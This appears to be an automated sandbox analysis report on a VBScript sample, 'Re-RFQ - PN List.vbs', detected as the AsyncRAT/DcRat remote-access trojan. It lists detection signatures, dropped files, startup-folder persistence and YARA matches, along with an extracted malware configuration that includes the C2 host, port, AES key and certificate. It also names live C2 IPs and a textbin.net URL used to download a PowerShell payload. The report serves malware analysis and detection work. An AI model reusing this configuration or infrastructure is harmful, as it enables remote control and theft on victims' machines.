Windows Analysis Report
Re-RFQ - PN List.vbs

Overview

General Information

Sample Name:	Re-RFQ - PN List.vbs
Analysis ID:	627719
MD5:	867aa07dd614380e5943bccd70fee675
SHA1:	b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256:	35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9
Tags:	vbs
Infos:

Detection

AsyncRAT, DcRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected RUNPE

System process connects to network (likely due to code injection or exploit)

Yara detected DcRat

Yara detected AsyncRAT

Antivirus detection for dropped file

Sigma detected: Drops script at startup location

Snort IDS alert for network traffic

Writes to foreign memory regions

Compiles code for process injection (via .Net compiler)

Wscript starts Powershell (via cmd or directly)

.NET source code references suspicious native API functions

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Detected TCP or UDP traffic on non-standard ports

Contains functionality to detect virtual machines (SLDT)

Creates a start menu entry (Start Menu\Programs\Startup)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Signatures

AV Detection

Found malware configuration

Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "sky01.publicvm.com", "Ports": "9217", "Version": " 1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "5RESCY68ciiacdgkayNo6rGfK4TKsWv4", "Mutex": "DcRatMutex_qwqdanchun", "AntiDetection": "null", "External_config_on_Pastebin": "false", "BDOS": "1", "Startup_Delay": "Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==", "HWID": "null", "Certificate": "MIICMDCCAZmgAwIBAgIVANDdhyIzFkRkVUdU1pUsWShwjeXTMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIwMTEyNzIxMjU0NVoXDTMxMDkwNjIxMjU0NVowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJAPN6hAAYtlFpprsg+awNYGXe+gvrIVoVQz2ubNjglQKceBMbhrB9fJZfXJkDLol6/a3Jd4JycS51W+zZgLbcjK8rwRyJ+AUI9TJN4ghCPvSgqXiqTzwruPo+z8B41xcddSJ8Iv49ReFpZGNfbzC4AL5U3gWj+Gq+o4Eh1TigrrAgMBAAGjMjAwMB0GA1UdDgQWBBSieJAE4Zd65wRgTOwM9yD2xjDKZjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH+wbEwYgTSF3NRuSaLbjALT8E5lmhrkkc7l8R7dojnqZqGA6GqIR3B1aERDKeX6YY3msdmw4uK4K7qWXuWRhjn1Zbweea4YrUyTLtTu1OYJpE9z7vVTfXi7Pkl+j9187kZ8f+S+EvFo9aw2YO5jK9UTyZ8dhtQuhpC9sRSCwQ5f", "ServerSignature": "WoklUUd+SGm6e+hGmYIVMdTguE/XnNLwPxGmIOoxt2UjxnKg6OsTdNTB9cmWQ+jVcpyD/M40s29l+GdlklpBRG3mflrHprg7R+Q9GKMdUToU8MO6imLwgYm5Ft0mzcc8W5sb5cqZ4Bg8wPJ907IBJ3Gd0vUUtxJgxLqCP7AFfis=", "Group": "false"}

Multi AV Scanner detection for submitted file

Source: Re-RFQ - PN List.vbs

ReversingLabs: Detection: 12%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\gia9ab2dg0.PS1	Avira: detection malicious, Label: DR/PShell.G2
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	Avira: detection malicious, Label: VBS/PSRunner.VPAY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Joe Sandbox ML: detected

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 199.102.48.248 1433			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: SQL8003.site4now.net

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2034847 ET TROJAN Observed Malicious SSL Cert (AsyncRAT) 91.193.75.216:9217 -> 192.168.2.6:49759
Source: Traffic	Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 91.193.75.216:9217 -> 192.168.2.6:49759

Yara detected Generic Downloader

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: sky01.publicvm.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 148.72.177.212 148.72.177.212
Source: Joe Sandbox View	IP Address: 199.102.48.248 199.102.48.248

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49732 -> 199.102.48.248:1433
Source: global traffic	TCP traffic: 192.168.2.6:49759 -> 91.193.75.216:9217

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.535727725.000001B3CCE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.510131517.0000024666F8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.538521959.000001D3A68A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5%
Source: wscript.exe, 00000000.00000003.389995366.000001C9E3EEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6699eb21577f6
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net
Source: powershell.exe, 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg0
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg00y

Source: unknown

DNS traffic detected: queries for: SQL8003.site4now.net

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
